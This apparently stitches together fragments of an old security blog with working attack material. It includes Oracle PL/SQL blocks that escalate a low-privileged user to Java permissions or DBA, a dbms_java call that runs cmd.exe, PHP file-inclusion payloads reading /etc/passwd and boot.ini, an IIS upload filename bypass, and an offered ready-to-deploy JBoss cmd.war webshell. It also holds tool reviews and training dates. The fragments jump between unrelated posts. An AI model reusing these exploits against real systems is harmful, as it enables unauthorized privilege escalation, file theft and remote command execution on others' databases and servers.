Eseentially, because of a flaw in DBMS_JVM_EXP_PERMS package, any user with just create session privileges can grant himself all java privileges.

DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,'java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,'ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Once the Java permissions are available, an end user can simple create a procedure and execute OS command from this procedure (http://milw0rm.com/exploits/2837).

However, if the create/execute procedure permissions are not available, David has another way to still execute OS code:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

Here is the link of the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov

<?php include(’inc/’.$_GET['page'].’php’); ?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quote_gpc is enabled than the null byte(%00) will get converted to /0, implying that the attack will fail.

How to bypass this: it you add a large number of dots (…..) than the null byte will not get escaped null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don’t need null byte here.

Update: As pointed out by Bodgan, this only works for windows. So replace /etc/passwd with /../../boot.ini. I will provide a POC link

tested on php version: 5.2.12 (wamp environment)

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar

image link
How many issues can one parameter suffer from:

1. Open redirection
2. Session ID in the URL
3. Session Hijacking by combining 1 and 2

Oh but, really safe against XSS!

IIS can execute any extension as an Active Server Page or any other executable extension. For instance “malicious.asp;.jpg” is executed as an ASP file on the server. Many file uploaders protect the system by checking only the last section of the filename as its extension. And by using this vulnerability, an attacker can bypass this protection and upload a dangerous executable file on the server.

Original Advisory can be found here

It did the same against the MS-SQL apps too. A closer look at oracle sql injection exploit revealed that core uses the same dbms_export_extension exploit which bsqlbf and pangolin uses. To obtain the shell with one click in a gui is always cool, less geeky though .

On the note of using commercial tools, another 2 tools which i have found very useful are:
Burp suite
Netsparker

While everyone knows about burp suite, its small features such as ‘AMF decoding/encoding’, invisible proxy, intruder with regex support, right click-> send to scanner feature etc makes it a perfect tool. The burp scanner’s xss module is just brilliant.

Netsparker is probably a tool which not too many people have heard of. Its an automated web application Its developed by Ferruh Mavituna, who knows this art very well. The tool has so far, given me minimal false positives and at the same time helped in identifying some complex SQL injections you will ever come across(example deep blind injections involving time delays).

More on commercial tools later..

Here is a good example, from his slides, on how mod-security can be bypassed:
—–
Rules apply all transformation functions first
• t:none – reset
• t:urlDecodeUni – url decoding with unicode support
• t:htmlEntityDecode – decodes HTML entities
• t:replaceComments – removes all comments
• t:compressWhitespace – compresses whitespace
—-

—

Download Slides

Here is a war file, ready to use: cmd.war (zipped)
Once deployed check for this file on the vulnerable jboss: http://victim:8080/cmd/cmd.jsp

Happy Hacking

November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html

At Owasp India, I will also be giving a talk. The talk is titled, ‘Hacking Oracle From Web’. Here I will discuss some advanced techniques for exploiting SQL/PLSQL Injections targeting Oracle back-end along with the security problems with other Oracle components such as Oracle Application Servers, Application Portal, Secure Back-up etc.

December 14th 2009
Venue: 7Safe, Sawston, Cambridge, U.K
Course Agenda/Outline:
http://7safe.com/oracle_database_security_training_course.htm

So, if you need to use it outside metasploit, here it is:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
DBMS_DEFER_SYS.DELETE_TRAN(’aaaaaa’,'a” and dbms_sql.execute(’||D||’)=1–’);
end;

text file